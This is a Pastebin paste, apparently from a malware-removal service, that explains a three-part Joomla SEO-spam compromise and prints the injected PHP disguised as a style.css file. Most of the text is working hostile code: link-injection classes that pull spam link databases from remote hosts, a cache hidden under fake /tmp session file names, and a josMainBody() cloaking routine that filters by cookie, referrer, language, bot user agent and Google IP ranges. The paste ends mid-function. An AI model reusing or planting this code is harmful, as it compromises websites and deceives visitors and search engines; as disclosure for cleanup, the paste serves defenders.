Advertisement
scurit

Joomla SEO Spam using josMainBody

Jun 30th, 2014
342
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
 1. Find this on your site? Need Help removing it? http://www.malwareremovalservice.com
 2.  
 3. Three parts to this attack
 4.  
 5. 1) a  josMainBody() function is inserted into the current template index.php file
 6. 2) an include for the /css/style.css file in the template index.php file
 7. 3) a php file disgused as "style.css" see code below:
 8.  
 9. <?php
 10. class lmp_base {
 11.  
 12.      var $lmp_version            = '3.03';
 13.  
 14.      var $lmp_charset            = 'UTF-8';
 15.  
 16.      var $lmp_cache_lifetime     = 3600;     //Âðåìÿ æèçíè êåøà (÷åðåç ñêîëüêî âðåìåíè îáíîâëÿòü)
 17.  
 18.      var $lmp_cache_reloadtime   = 15;     // Åñëè ñêà÷àòü áàçó ññûëîê íå óäàëîñü, òî ñëåäóþùàÿ ïîïûòêà áóäåò ÷åðåç ñòîëüêî ñåêóíä
 19.  
 20.      var $lmp_links_db_file      = '';
 21.  
 22.      var $lmp_error              = '';
 23.  
 24.      var $lmp_error_desplay      = false;
 25.  
 26.      var $lmp_request_uri        = '';
 27.  
 28.      var $lmp_multi_site         = false;
 29.  
 30.      var $lmp_server             = 'goooogle.biz/~lmpsees';
 31.  
 32.      var $lmp_host_connect_type  = 'file_get_contents';  // Ñïîñîá ïîäêëþ÷åíèÿ ê ñåðâåðó [file_get_contents|curl|socket]
 33.  
 34.      var $lmp_socket_timeout     = 6;       // Ñêîëüêî æäàòü îòâåòà îò ñåðâåðà
 35.  
 36.      var $lmp_host               = '';
 37.      
 38.      var $lmp_is_our_bot         = false;          
 39.      
 40.      var $lmp_showedtag          = false;
 41.      
 42.      var $lmp_check_code                 =  true;   //Ïîêàçûâàòü èëè íåò ïðîâåðî÷íûé êîä <!-- LMP -->, äëÿ ïðîâåðêè ïðàâèëüíîñòè óñòàíîâêè êîäà
 43.      
 44.      function lmp_base($opts = null){
 45.  
 46.           if(is_array($opts)){
 47.               if(isset($opts['host']))$this->lmp_host=$opts['host'];
 48.           }
 49.           elseif(strlen($opts)){
 50.              $this->lmp_server=$opts;
 51.              $opts=array();
 52.           }
 53.           else {
 54.              $this->lmp_host='';
 55.              $opts=array();
 56.           }
 57.  
 58.           if ($this->lmp_host == '')$this->lmp_host = $_SERVER['HTTP_HOST'];
 59.  
 60.           $this->lmp_host = strtr(strtr($this->lmp_host, array('www.'=>'')), array('http://'=>''));
 61.          
 62.           if (isset($opts['server']) && strlen($opts['server']))$this->lmp_server = $opts['server'];
 63.  
 64.           if (isset($opts['request_uri']) && strlen($opts['request_uri']))$this->lmp_request_uri = $opts['request_uri'];
 65.           else $this->lmp_request_uri = $_SERVER['REQUEST_URI'];
 66.  
 67.           if (isset($opts['multi_site']) && $opts['multi_site'] == true)$this->lmp_multi_site = true;
 68.  
 69.           if (isset($opts['error_desplay']) && $opts['error_desplay'] == true)$this->lmp_error_desplay = true;
 70.  
 71.           if (isset($opts['host_connect_type']) && strlen($opts['host_connect_type']))$this->lmp_host_connect_type = $opts['host_connect_type'];
 72.  
 73.           if (isset($opts['socket_timeout'])){
 74.              if(preg_match("/^[0-9]+$/si", $opts['socket_timeout'])){
 75.                 if($opts['socket_timeout']>0)$this->lmp_socket_timeout = $opts['socket_timeout'];
 76.              }
 77.           }
 78.          
 79.           if(isset($opts['check_code'])){
 80.             if($opts['check_code']==true or $opts['check_code']==false)$this->lmp_check_code = $opts['check_code'];
 81.           }
 82.  
 83.             // Îïðåäåëÿåì íàø ëè ðîáîò
 84.             if (isset($_SERVER['HTTP_USER_AGENT']) && ($_SERVER['HTTP_USER_AGENT'] == 'LMP_Robot')) {
 85.                 $this->lmp_is_our_bot = true;
 86.             } else {
 87.                 $this->lmp_is_our_bot = false;
 88.             }
 89.  
 90.           //$this->return_link_array();
 91.      }
 92.  
 93.      //Ñ÷èòûâàíèå ôàéëà óäàëåííî
 94.      function get_file( $host, $path ){
 95.  
 96.           $user_agent = 'LMP_Client PHP ' . $this->lmp_version;
 97.          
 98.           @ini_set('allow_url_fopen',          1);
 99.           @ini_set('default_socket_timeout',   $this->lmp_socket_timeout);
 100.           @ini_set('user_agent',               $user_agent);
 101.  
 102.           if($this->lmp_host_connect_type=='file_get_contents'){
 103.                             //print 'http://' . $host . $path;
 104.               if ($data = @file_get_contents('http://' . $host . $path)) {
 105.                   return $data;
 106.               }
 107.  
 108.           }
 109.  
 110.           elseif($this->lmp_host_connect_type=='curl'){
 111.  
 112.              if ($ch = @curl_init()) {
 113.                  @curl_setopt($ch, CURLOPT_URL,              'http://' . $host . $path);
 114.                  @curl_setopt($ch, CURLOPT_HEADER,           false);
 115.                  @curl_setopt($ch, CURLOPT_RETURNTRANSFER,   true);
 116.                  @curl_setopt($ch, CURLOPT_CONNECTTIMEOUT,   $this->lmp_socket_timeout);
 117.                  @curl_setopt($ch, CURLOPT_USERAGENT,        $user_agent);
 118.  
 119.                  if ($data = curl_exec($ch)) {
 120.                     //print $data;
 121.                      @curl_close($ch);
 122.                      return $data;
 123.                  }
 124.  
 125.  
 126.                  @curl_close($ch);
 127.  
 128.              }
 129.  
 130.           }
 131.  
 132.           elseif($this->lmp_host_connect_type=='socket'){
 133.  
 134.              $c = '';
 135.              $fp = @fsockopen('www.' . $host, 80, $errno, $errstr, $this->lmp_socket_timeout);
 136.              if ($fp) {
 137.                  @fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n");
 138.                  @fputs($fp, "User-Agent: {$user_agent}\r\n\r\n");
 139.                  while (!@feof($fp)) {
 140.                      $c .= @fgets($fp, 128);
 141.                  }
 142.                  @fclose($fp);
 143.  
 144.                  $data = explode("\r\n\r\n", $c);
 145.  
 146.                  return $data[1];
 147.              }
 148.  
 149.           }
 150.  
 151.           else {
 152.               $this->raise_error('Íåïðàâèëüíî óêàçàí ñïîñîá ïîäêëþ÷åíèÿ ê ñåðâåðó');
 153.               return false;
 154.           }
 155.  
 156.           return $this->raise_error('Íåâîçìîæíî ïîäêëþ÷èòüñÿ ê ñåðâåðó... ' . $host . $path);
 157.  
 158.      }
 159.  
 160.  
 161.      //Ôóíêöèÿ äëÿ ÷òåíèÿ áàçû ññûëîê èç êåøà
 162.      function lmp_read( $file ) {
 163.  
 164.         $fp = @fopen($file, 'rb');
 165.         @flock($fp, LOCK_SH);
 166.         if ($fp) {
 167.  
 168.              $length = @filesize($file);
 169.              $mqr = get_magic_quotes_runtime();
 170.              set_magic_quotes_runtime(0);
 171.              if ($length) {
 172.                  $data = @fread($fp, $length);
 173.              } else {
 174.                  $data = '';
 175.              }
 176.              set_magic_quotes_runtime($mqr);
 177.              @flock($fp, LOCK_UN);
 178.              @fclose($fp);
 179.  
 180.              return $data;
 181.          }
 182.  
 183.          return $this->raise_error('Íåâîçìîæíî ñ÷èòàòü äàííûå èç ôàéëà: ' . $file);
 184.      }
 185.      
 186.  
 187.      //Ôóíêöèÿ çàïèñè â ëîêàëüíûé ôàéë
 188.      function lmp_write($filename, $data) {
 189.  
 190.         $fp = @fopen($filename, 'wb');
 191.         if ($fp) {
 192.             @flock($fp, LOCK_EX);
 193.             $length = strlen($data);
 194.             @fwrite($fp, $data, $length);
 195.             @flock($fp, LOCK_UN);
 196.             @fclose($fp);
 197.  
 198.             if (md5($this->lmp_read($filename)) != md5($data)) {
 199.                 return $this->raise_error('Íàðóøåíà öåëîñòíîñòü äàííûõ ïðè çàïèñè â ôàéë: ' . $filename);
 200.             }
 201.  
 202.             return true;
 203.         }
 204.  
 205.         return $this->raise_error('Íå ìîãó çàïèñàòü äàííûå â ôàéë: ' . $filename);
 206.      }    
 207.      
 208.      //Îòîáðàæåíèå îøèáîê
 209.      function raise_error($err) {
 210.  
 211.          $this->lmp_error = '<p style="color: red; font-weight: bold;">LMPanel error: '.$err.'</p>';
 212.  
 213.          if ($this->lmp_error_desplay == true) {
 214.              print $this->lmp_error;
 215.          }
 216.  
 217.          return false;
 218.      }
 219.      
 220.      function load_data(){
 221.                 $this->lmp_links_db_file = $this->_get_db_file();
 222.        
 223.           if(!is_file($this->lmp_links_db_file)){
 224.               if(@touch($this->lmp_links_db_file)){
 225.                   chmod($this->lmp_links_db_file, 0666);
 226.  
 227.               }
 228.               else return $this->raise_error('Íåâîçìîæíî ñîçäàòü ôàéë ' . $this->lmp_links_db_file . '. Óñòàíîâèòå íà äèððåêòîðèþ ñî ññûëêàìè ïðàâà 777');
 229.           }
 230.          
 231.             if (!is_writable($this->lmp_links_db_file)) {
 232.                 return $this->raise_error('Íåò äîñòóïà íà çàïèñü ê ôàéëó: ' . $this->lmp_links_db_file . '! Âûñòàâèòå ïðàâà 777 íà ïàïêó.');
 233.             }          
 234.  
 235.  
 236.           if(filemtime($this->lmp_links_db_file) < (time()-$this->lmp_cache_lifetime) || filesize($this->lmp_links_db_file) == 0) {
 237.  
 238.              @touch($this->lmp_links_db_file, (time() - $this->lmp_cache_lifetime + $this->lmp_cache_reloadtime));
 239.  
 240.              //$path = '/downlbase.php?host=' . urlencode($this->lmp_host);
 241.              $path = $this->_get_dispenser_path();
 242.  
 243.              if(preg_match("/\//si", $this->lmp_server)){
 244.                 $path = preg_replace("/^[^\/]+(\/.+)$/si", "$1", $this->lmp_server).$path;
 245.                 $this->lmp_server = preg_replace("/^([^\/]+)\/.+$/si", "$1", $this->lmp_server);
 246.              }
 247.  
 248.              if ($data = $this->get_file($this->lmp_server, $path)) {
 249.                  if (preg_match("/^FATAL ERROR:.+$/si", $data)) {
 250.                      $this->raise_error($data);
 251.                  }
 252.  
 253.                  else {
 254.                    
 255.                      // [ïñåâäî]ïðîâåðêà öåëîñòíîñòè:
 256.                      if (@unserialize($data) != false) {
 257.  
 258.                          $this->lmp_write($this->lmp_links_db_file, $data);
 259.  
 260.                      }
 261.                  }
 262.              }
 263.           }  
 264.          
 265.           if (strlen(session_id())) {
 266.               $session = session_name() . '=' . session_id();
 267.               $this->lmp_request_uri = preg_replace("/^(.+)[\?&]{1}".$session."$/si", "$1", $this->lmp_request_uri);
 268.           }          
 269.          
 270.             if ($data = $this->lmp_read($this->lmp_links_db_file)) {
 271.                     $unsData = @unserialize($data);
 272.                 $this->lmp_charset = $unsData['lmp_charset'];
 273.                 $this->set_data($unsData);
 274.             }
 275.      }
 276. }
 277.  
 278. //Êëàññ äëÿ ññûëîê
 279. class lmp_client extends lmp_base {
 280.  
 281.      var $lmp_links_page         = array();
 282.  
 283.      var $lmp_links              = '';
 284.  
 285.      var $lmp_links_delimiter    = '';
 286.  
 287.      var $lmp_blocks             = 1;
 288.      
 289.      var $lmp_block_type         = 1;
 290.      
 291.      var $lmp_block_info         = Array();
 292.      
 293.  
 294.     function lmp_client($options = null) {
 295.         parent::lmp_base($options);
 296.         $this->load_data();
 297.     }
 298.    
 299.     //ññûëêè
 300.     function print_links($block_id=''){
 301.          if($block_id == '')$block_id = 1;
 302.          
 303.          $html = '';
 304.  
 305.          if (is_array($this->lmp_links_page) & sizeof($this->lmp_links_page)>0 & $this->lmp_is_our_bot==false) {
 306.  
 307.              if($this->lmp_charset != ''){
 308.  
 309.                 if(function_exists('iconv')){
 310.                    foreach($this->lmp_links_page as $el){
 311.                    //   print $this->lmp_charset;
 312.                        $linkz[] = iconv("Windows-1251", $this->lmp_charset, $el);
 313.                    }
 314.                 }
 315.                 else {
 316.                    foreach($this->lmp_links_page as $el){
 317.                        $linkz[] = @mb_convert_encoding($el, $this->lmp_charset, "Windows-1251");
 318.                    }
 319.  
 320.                 }
 321.              }
 322.              else $linkz = $this->lmp_links_page;
 323.              
 324.              if(isset($linkz)){
 325.                  for($i=0; $i<sizeof($linkz); $i+=$this->lmp_blocks):
 326.                     $n = $i;
 327.                     for($k=0; $k<$this->lmp_blocks; $k++):
 328.                        if(($k+1) == $block_id)$links[]=$linkz[$n];
 329.                        $n++;
 330.                     endfor;
 331.                  endfor;
 332.              }
 333.              
 334.              if(!is_array($links))$links[]='';
 335.              
 336.              $links2 = $links;
 337.              unset($links);
 338.              foreach($links2 as $el=>$val){
 339.                 if(trim($links2[$el])!='')$links[] = $links2[$el];
 340.              }
 341.  
 342.              if($this->lmp_block_type==1){
 343.                 $html = @join($this->lmp_block_info['links_delimiter'], $links);
 344.              }
 345.              else {
 346.               if(@count($links)>0){
 347.                 $html = '<table style="padding:5px;border: 1px solid;background-color:#'.$this->lmp_block_info['bg'].';border-color:#'.$this->lmp_block_info['border'].';width:'.$this->lmp_block_info['width'].'px;height:'.$this->lmp_block_info['height'].'px;">';
 348.                 if($this->lmp_block_info['chered']=='h')$html .= "<tr>";
 349.                 foreach($links as $el){
 350.                    $desc = strip_tags($el);
 351.                    $title = preg_replace("/^.{0,}<a[^>]+>(.+)<\/a>.{0,}$/si", "$1", $el);
 352.                    $url = preg_replace("/^.{0,}<a href=[\"']{1}([^'\"]+)[\"']{1}.+$/si", "$1", $el);
 353.  
 354.                    if($this->lmp_block_info['chered']=='v')$html .= "<tr>";
 355.                    $html .= '<td style="text-align:left;padding: 6px;"><a href="'.$url.'" target="_blank" style="text-decoration:underline;font-size:'.($this->lmp_block_info['fsize']+1).'px;color:#'.$this->lmp_block_info['title'].';">'.$title.'</a><br><font style="font-size:'.$this->lmp_block_info['fsize'].'px;color:#'.$this->lmp_block_info['desc'].';">'.$desc.'</font><br><font style="font-size:'.($this->lmp_block_info['fsize']-1).'px;color:#'.$this->lmp_block_info['url'].';">'.$url.'</font></td>';
 356.                    if($this->lmp_block_info['chered']=='v')$html .= "</tr>";
 357.                 }
 358.                 if($this->lmp_block_info['chered']=='h')$html .= "</tr>";
 359.                 $html .= '</table>';
 360.               }
 361.              }
 362.              
 363.          }
 364.  
 365.          if(!$this->lmp_showedtag){
 366.              if($this->lmp_is_our_bot == true)$html.='<!-- LMP -->';
 367.              elseif($this->lmp_check_code == true)$html.='<!-- LMP -->';
 368.              $this->lmp_showedtag = true;
 369.          }
 370.  
 371.          return $html;
 372.  
 373.     }
 374.    
 375.     //îïöèè áëîêà (ß.äèðåêò)
 376.     function set_block_opts($width=100, $height='', $fsize=11, $chered=''){
 377.        if($this->lmp_block_type==2){
 378.          if($width!='')$this->lmp_block_info['width'] = $width;
 379.          if($height!='')$this->lmp_block_info['height'] = $height;
 380.          if($fsize!='')$this->lmp_block_info['fsize'] = $fsize;
 381.          if($chered!='')$this->lmp_block_info['chered'] = $chered;
 382.        }
 383.     }    
 384.    
 385.     function _get_db_file() {
 386.             return '/tmp/sess_7a68212f5df4s2141w8479e57d096af74baussaw';
 387.     }
 388.    
 389.     function _get_dispenser_path() {
 390.         return '/downlbase.php?type=1&host=' . urlencode($this->lmp_host);
 391.     }
 392.    
 393.     function set_data($data) {
 394.         $this->lmp_links = $data;
 395.         if (@array_key_exists($this->lmp_request_uri, $this->lmp_links) && is_array($this->lmp_links[$this->lmp_request_uri])) {
 396.  
 397.                         $this->lmp_links_page = $this->lmp_links[$this->lmp_request_uri];
 398.                 $this->lmp_links_delimiter = $this->lmp_links[$this->lmp_request_uri];
 399.                
 400.               if(isset($this->lmp_links['lmp_block_info'])){
 401.                  $this->lmp_block_type = $this->lmp_links['lmp_block_info']['type'];
 402.                  
 403.                  if($this->lmp_block_type == 1)$this->lmp_block_info = Array("links_delimiter"=>$this->lmp_links['lmp_block_info']['delimiter']);
 404.                  else {
 405.                     $this->lmp_block_info = Array("border"=>$this->lmp_links['lmp_block_info']['border'],
 406.                                                   "bg"=>$this->lmp_links['lmp_block_info']['bg'],
 407.                                                   "title"=>$this->lmp_links['lmp_block_info']['title'],
 408.                                                   "desc"=>$this->lmp_links['lmp_block_info']['desc'],
 409.                                                   "url"=>$this->lmp_links['lmp_block_info']['url'],
 410.                                                   "width"=>100,
 411.                                                   "height"=>100,
 412.                                                   "fsize"=>11,
 413.                                                   "chered"=>'h');
 414.                                            
 415.                  }
 416.               }
 417.    
 418.               if(isset($this->lmp_links['lmp_blocks']))$this->lmp_blocks=$this->lmp_links['lmp_blocks'];
 419.  
 420.         }
 421.     }  
 422. }
 423.  
 424.  
 425. class LinkfeedClient {
 426.     var $lc_version           = '0.4.1';
 427.     var $lc_verbose           = false;
 428.     var $lc_charset           = 'DEFAULT';
 429.     var $lc_use_ssl           = false;
 430.     var $lc_server            = 'db.linkfeed.ru';
 431.     var $lc_cache_lifetime    = 3600;
 432.     var $lc_cache_reloadtime  = 300;
 433.     var $lc_links_db_file     = '';
 434.     var $lc_links             = array();
 435.     var $lc_links_page        = array();
 436.     var $lc_links_delimiter   = '';
 437.     var $lc_error             = '';
 438.     var $lc_host              = '';
 439.     var $lc_request_uri       = '';
 440.     var $lc_fetch_remote_type = '';
 441.     var $lc_socket_timeout    = 6;
 442.     var $lc_force_show_code   = false;
 443.     var $lc_multi_site        = false;
 444.     var $lc_is_static         = false;
 445.     var $lc_ignore_tailslash  = false;
 446.  
 447.     function LinkfeedClient($options = null) {
 448.         $host = '';
 449.  
 450.         if (is_array($options)) {
 451.             if (isset($options['host'])) {
 452.                 $host = $options['host'];
 453.             }
 454.         } elseif (strlen($options) != 0) {
 455.             $host = $options;
 456.             $options = array();
 457.         } else {
 458.             $options = array();
 459.         }
 460.  
 461.         if (strlen($host) != 0) {
 462.             $this->lc_host = $host;
 463.         } else {
 464.             $this->lc_host = $_SERVER['HTTP_HOST'];
 465.         }
 466.  
 467.         $this->lc_host = preg_replace('{^https?://}i', '', $this->lc_host);
 468.         $this->lc_host = preg_replace('{^www\.}i', '', $this->lc_host);
 469.         $this->lc_host = strtolower( $this->lc_host);
 470.  
 471.         if (isset($options['is_static']) && $options['is_static']) {
 472.             $this->lc_is_static = true;
 473.         }
 474.  
 475.         if (isset($options['ignore_tailslash']) && $options['ignore_tailslash']) {
 476.             $this->lc_ignore_tailslash = true;
 477.         }
 478.  
 479.         if (isset($options['request_uri']) && strlen($options['request_uri']) != 0) {
 480.             $this->lc_request_uri = $options['request_uri'];
 481.         } else {
 482.             if ($this->lc_is_static) {
 483.                 $this->lc_request_uri = preg_replace( '{\?.*$}', '', $_SERVER['REQUEST_URI']);
 484.                 $this->lc_request_uri = preg_replace( '{/+}', '/', $this->lc_request_uri);
 485.             } else {
 486.                 $this->lc_request_uri = $_SERVER['REQUEST_URI'];
 487.             }
 488.         }
 489.  
 490.         $this->lc_request_uri = rawurldecode($this->lc_request_uri);
 491.  
 492.         if (isset($options['multi_site']) && $options['multi_site'] == true) {
 493.             $this->lc_multi_site = true;
 494.         }
 495.  
 496.         if ((isset($options['verbose']) && $options['verbose']) ||
 497.             isset($this->lc_links['__linkfeed_debug__'])) {
 498.             $this->lc_verbose = true;
 499.         }
 500.  
 501.         if (isset($options['charset']) && strlen($options['charset']) != 0) {
 502.             $this->lc_charset = $options['charset'];
 503.         }
 504.  
 505.         if (isset($options['fetch_remote_type']) && strlen($options['fetch_remote_type']) != 0) {
 506.             $this->lc_fetch_remote_type = $options['fetch_remote_type'];
 507.         }
 508.  
 509.         if (isset($options['socket_timeout']) && is_numeric($options['socket_timeout']) && $options['socket_timeout'] > 0) {
 510.             $this->lc_socket_timeout = $options['socket_timeout'];
 511.         }
 512.  
 513.         if ((isset($options['force_show_code']) && $options['force_show_code']) ||
 514.             isset($this->lc_links['__linkfeed_debug__'])) {
 515.             $this->lc_force_show_code = true;
 516.         }
 517.  
 518.         if (!defined('LINKFEED_USER')) {
 519.             return $this->raise_error("Constant LINKFEED_USER is not defined.");
 520.         }
 521.  
 522.         $this->load_links();
 523.     }
 524.  
 525.     function load_links() {
 526.         if ($this->lc_multi_site) {
 527.             $this->lc_links_db_file = '/tmp/sess_7a68212f5df4s2141w8479e57d096af74baussaw1';
 528.         } else {
 529.             $this->lc_links_db_file = '/tmp/sess_7a68212f5df4s2141w8479e57d096af74baussaw1';
 530.         }
 531.  
 532.         if (!is_file($this->lc_links_db_file)) {
 533.             if (@touch($this->lc_links_db_file, time() - $this->lc_cache_lifetime)) {
 534.                 @chmod($this->lc_links_db_file, 0666);
 535.             } else {
 536.                 return $this->raise_error("There is no file " . $this->lc_links_db_file  . ". Fail to create. Set mode to 777 on the folder.");
 537.             }
 538.         }
 539.  
 540.         if (!is_writable($this->lc_links_db_file)) {
 541.             return $this->raise_error("There is no permissions to write: " . $this->lc_links_db_file . "! Set mode to 777 on the folder.");
 542.         }
 543.  
 544.         @clearstatcache();
 545.  
 546.         if (filemtime($this->lc_links_db_file) < (time()-$this->lc_cache_lifetime) ||
 547.            (filemtime($this->lc_links_db_file) < (time()-$this->lc_cache_reloadtime) && filesize($this->lc_links_db_file) == 0)) {
 548.  
 549.             @touch($this->lc_links_db_file, time());
 550.  
 551.             $path = '/' . LINKFEED_USER . '/' . strtolower( $this->lc_host ) . '/' . strtoupper( $this->lc_charset);
 552.  
 553.             if ($links = $this->fetch_remote_file($this->lc_server, $path)) {
 554.                 if (substr($links, 0, 12) == 'FATAL ERROR:') {
 555.                     $this->raise_error($links);
 556.                 } else if (@unserialize($links) !== false) {
 557.                     $this->lc_write($this->lc_links_db_file, $links);
 558.                 } else {
 559.                     $this->raise_error("Cann't unserialize received data.");
 560.                 }
 561.             }
 562.         }
 563.  
 564.         $links = $this->lc_read($this->lc_links_db_file);
 565.         $this->lc_file_change_date = gmstrftime ("%d.%m.%Y %H:%M:%S",filectime($this->lc_links_db_file));
 566.         $this->lc_file_size = strlen( $links);
 567.         if (!$links) {
 568.             $this->lc_links = array();
 569.             $this->raise_error("Empty file.");
 570.         } else if (!$this->lc_links = @unserialize($links)) {
 571.             $this->lc_links = array();
 572.             $this->raise_error("Cann't unserialize data from file.");
 573.         }
 574.  
 575.         if (isset($this->lc_links['__linkfeed_delimiter__'])) {
 576.             $this->lc_links_delimiter = $this->lc_links['__linkfeed_delimiter__'];
 577.         }
 578.  
 579.         $lc_links_temp=array();
 580.         foreach($this->lc_links as $key=>$value){
 581.           $lc_links_temp[rawurldecode($key)]=$value;
 582.         }
 583.         $this->lc_links=$lc_links_temp;
 584.         if ($this->lc_ignore_tailslash && $this->lc_request_uri[strlen($this->lc_request_uri)-1]=='/') $this->lc_request_uri=substr($this->lc_request_uri,0,-1);
 585.         $this->lc_links_page=array();
 586.         if (array_key_exists($this->lc_request_uri, $this->lc_links) && is_array($this->lc_links[$this->lc_request_uri])) {
 587.             $this->lc_links_page = array_merge($this->lc_links_page, $this->lc_links[$this->lc_request_uri]);
 588.         }
 589.         if ($this->lc_ignore_tailslash && array_key_exists($this->lc_request_uri.'/', $this->lc_links) && is_array($this->lc_links[$this->lc_request_uri.'/'])) {
 590.             $this->lc_links_page =array_merge($this->lc_links_page, $this->lc_links[$this->lc_request_uri.'/']);
 591.         }
 592.  
 593.         $this->lc_links_count = count($this->lc_links_page);
 594.     }
 595.  
 596.     function return_links($n = null) {
 597.         $result = '';
 598.         if (isset($this->lc_links['__linkfeed_start__']) && strlen($this->lc_links['__linkfeed_start__']) != 0 &&
 599.             (in_array($_SERVER['REMOTE_ADDR'], $this->lc_links['__linkfeed_robots__']) || $this->lc_force_show_code)
 600.         ) {
 601.             $result .= $this->lc_links['__linkfeed_start__'];
 602.         }
 603.  
 604.         if (isset($this->lc_links['__linkfeed_robots__']) && in_array($_SERVER['REMOTE_ADDR'], $this->lc_links['__linkfeed_robots__']) || $this->lc_verbose) {
 605.  
 606.             if ($this->lc_error != '') {
 607.                 $result .= $this->lc_error;
 608.             }
 609.  
 610.             $result .= '<!--REQUEST_URI=' . $_SERVER['REQUEST_URI'] . "-->\n";
 611.             $result .= "\n<!--\n";
 612.             $result .= 'L ' . $this->lc_version . "\n";
 613.             $result .= 'REMOTE_ADDR=' . $_SERVER['REMOTE_ADDR'] . "\n";
 614.             $result .= 'request_uri=' . $this->lc_request_uri . "\n";
 615.             $result .= 'charset=' . $this->lc_charset . "\n";
 616.             $result .= 'is_static=' . $this->lc_is_static . "\n";
 617.             $result .= 'multi_site=' . $this->lc_multi_site . "\n";
 618.             $result .= 'file change date=' . $this->lc_file_change_date . "\n";
 619.             $result .= 'lc_file_size=' . $this->lc_file_size . "\n";
 620.             $result .= 'lc_links_count=' . $this->lc_links_count . "\n";
 621.             $result .= 'left_links_count=' . count($this->lc_links_page) . "\n";
 622.             $result .= 'n=' . $n . "\n";
 623.             $result .= '-->';
 624.         }
 625.  
 626.         if (is_array($this->lc_links_page)) {
 627.             $total_page_links = count($this->lc_links_page);
 628.  
 629.             if (!is_numeric($n) || $n > $total_page_links) {
 630.                 $n = $total_page_links;
 631.             }
 632.  
 633.             $links = array();
 634.  
 635.             for ($i = 0; $i < $n; $i++) {
 636.                 $links[] = array_shift($this->lc_links_page);
 637.             }
 638.  
 639.             if ( count($links) > 0 && isset($this->lc_links['__linkfeed_before_text__']) ) {
 640.                $result .= $this->lc_links['__linkfeed_before_text__'];
 641.             }
 642.  
 643.             $result .= implode($this->lc_links_delimiter, $links);
 644.  
 645.             if ( count($links) > 0 && isset($this->lc_links['__linkfeed_after_text__']) ) {
 646.                $result .= $this->lc_links['__linkfeed_after_text__'];
 647.             }
 648.         }
 649.         if (isset($this->lc_links['__linkfeed_end__']) && strlen($this->lc_links['__linkfeed_end__']) != 0 &&
 650.             (in_array($_SERVER['REMOTE_ADDR'], $this->lc_links['__linkfeed_robots__']) || $this->lc_force_show_code)
 651.         ) {
 652.             $result .= $this->lc_links['__linkfeed_end__'];
 653.         }
 654.         return $result;
 655.     }
 656.  
 657.     function fetch_remote_file($host, $path) {
 658.         $user_agent = 'Linkfeed Client PHP ' . $this->lc_version;
 659.  
 660.         @ini_set('allow_url_fopen', 1);
 661.         @ini_set('default_socket_timeout', $this->lc_socket_timeout);
 662.         @ini_set('user_agent', $user_agent);
 663.  
 664.         if (
 665.             $this->lc_fetch_remote_type == 'file_get_contents' || (
 666.                 $this->lc_fetch_remote_type == '' && function_exists('file_get_contents') && ini_get('allow_url_fopen') == 1
 667.             )
 668.         ) {
 669.             if ($data = @file_get_contents('http://' . $host . $path)) {
 670.                 return $data;
 671.             }
 672.         } elseif (
 673.             $this->lc_fetch_remote_type == 'curl' || (
 674.                 $this->lc_fetch_remote_type == '' && function_exists('curl_init')
 675.             )
 676.         ) {
 677.             if ($ch = @curl_init()) {
 678.                 @curl_setopt($ch, CURLOPT_URL, 'http://' . $host . $path);
 679.                 @curl_setopt($ch, CURLOPT_HEADER, false);
 680.                 @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 681.                 @curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $this->lc_socket_timeout);
 682.                 @curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
 683.  
 684.                 if ($data = @curl_exec($ch)) {
 685.                     return $data;
 686.                 }
 687.  
 688.                 @curl_close($ch);
 689.             }
 690.         } else {
 691.             $buff = '';
 692.             $fp = @fsockopen($host, 80, $errno, $errstr, $this->lc_socket_timeout);
 693.             if ($fp) {
 694.                 @fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n");
 695.                 @fputs($fp, "User-Agent: {$user_agent}\r\n\r\n");
 696.                 while (!@feof($fp)) {
 697.                     $buff .= @fgets($fp, 128);
 698.                 }
 699.                 @fclose($fp);
 700.  
 701.                 $page = explode("\r\n\r\n", $buff);
 702.  
 703.                 return $page[1];
 704.             }
 705.         }
 706.  
 707.         return $this->raise_error("Cann't connect to server: " . $host . $path);
 708.     }
 709.  
 710.     function lc_read($filename) {
 711.         $fp = @fopen($filename, 'rb');
 712.         @flock($fp, LOCK_SH);
 713.         if ($fp) {
 714.             clearstatcache();
 715.             $length = @filesize($filename);
 716.             $mqr = get_magic_quotes_runtime();
 717.             set_magic_quotes_runtime(0);
 718.             if ($length) {
 719.                 $data = @fread($fp, $length);
 720.             } else {
 721.                 $data = '';
 722.             }
 723.             set_magic_quotes_runtime($mqr);
 724.             @flock($fp, LOCK_UN);
 725.             @fclose($fp);
 726.  
 727.             return $data;
 728.         }
 729.  
 730.         return $this->raise_error("Cann't get data from the file: " . $filename);
 731.     }
 732.  
 733.     function lc_write($filename, $data) {
 734.         $fp = @fopen($filename, 'wb');
 735.         if ($fp) {
 736.             @flock($fp, LOCK_EX);
 737.             $length = strlen($data);
 738.             @fwrite($fp, $data, $length);
 739.             @flock($fp, LOCK_UN);
 740.             @fclose($fp);
 741.  
 742.             if (md5($this->lc_read($filename)) != md5($data)) {
 743.                 return $this->raise_error("Integrity was breaken while writing to file: " . $filename);
 744.             }
 745.  
 746.             return true;
 747.         }
 748.  
 749.         return $this->raise_error("Cann't write to file: " . $filename);
 750.     }
 751.  
 752.     function raise_error($e) {
 753.         $this->lc_error = '<!--ERROR: ' . $e . '-->';
 754.         return false;
 755.     }
 756. }
 757.  
 758. function josMainBody(){
 759. error_reporting(0);
 760. function striposssi($haystack, $needle){    return strpos($haystack, stristr( $haystack, $needle ));}
 761.  
 762.    if ($_COOKIE['SESSe7da53566c688d456347'] =="3cca28a37dc22cfff5eab70704ee5301")
 763.    {
 764.    echo '<div id="nvorst">';
 765.    }
 766.    else
 767.    {
 768.      $rsp=striposssi($_SERVER['HTTP_REFERER'],'sape');
 769.      $qsp=striposssi($_SERVER['HTTP_REFERER'],'linkfeed');
 770.      
 771.      $rrs=striposssi($_SERVER['HTTP_ACCEPT_LANGUAGE'],'ru');
 772.      $gbot=striposssi($_SERVER['HTTP_USER_AGENT'], 'google');
 773.      $ybot=striposssi($_SERVER['HTTP_USER_AGENT'], 'yandex');
 774.      
 775.      $stop_ips_masks = array(
 776.                 "66\.249\.[6-9][0-9]\.[0-9]+",  // Google   NetRange:   66.249.64.0 - 66.249.95.255
 777.                 "74\.125\.[0-9]+\.[0-9]+",      // Google   NetRange:   74.125.0.0 - 74.125.255.255
